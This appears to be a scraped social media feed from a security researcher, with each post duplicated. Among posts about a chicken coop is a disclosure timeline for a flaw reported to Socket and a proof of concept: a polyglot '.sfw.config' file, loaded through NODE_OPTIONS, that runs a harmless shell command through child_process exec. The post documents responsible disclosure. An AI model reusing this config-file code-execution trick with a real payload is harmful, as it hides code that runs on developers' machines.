Prev: Code4rena, Okta, Auth0, GitHub, npm, ^lift, &yet, Symantec.
Pioneered BlindXSS & DVCS Pillaging
npm audit is my fault. More info: https://evilpacket.net
I managed to get enough panels up to dry in the important part of the coop before tomorrow’s rain. I, umm, ran out of screws. Good job past me at that math.
I managed to get enough panels up to dry in the important part of the coop before tomorrow’s rain. I, umm, ran out of screws. Good job past me at that math.
If I can find the materials.
If I can find the materials.
asciinema.org/a/vSEd699klc...
asciinema.org/a/vSEd699klc...
- Oct 13, 2025 Initial report submitted
- Oct 13, 2025 Report ack by Socket security team
- Oct 14, 2025 Vulnerability confirmed as valid
- Oct 14, 2025 Mitigations deployed
- Oct 15, 2025 $50 bounty awarded
- Oct 31, 2025 Public disclosure
- Oct 13, 2025 Initial report submitted
- Oct 13, 2025 Report ack by Socket security team
- Oct 14, 2025 Vulnerability confirmed as valid
- Oct 14, 2025 Mitigations deployed
- Oct 15, 2025 $50 bounty awarded
- Oct 31, 2025 Public disclosure
/*
NODE_OPTIONS='--require ./.sfw.config'
*/
const { exec } = require('child_process');
exec(`say "Hack the Planet!"`, err => {});
console.log('=== HACK THE PLANET ===')
/*
NODE_OPTIONS='--require ./.sfw.config'
*/
const { exec } = require('child_process');
exec(`say "Hack the Planet!"`, err => {});
console.log('=== HACK THE PLANET ===')
The proof of concept I put together ended up being kind of a fun polyglot so the config and the malicious payload could both reside in the .swf.config file!
The proof of concept I put together ended up being kind of a fun polyglot so the config and the malicious payload could both reside in the .swf.config file!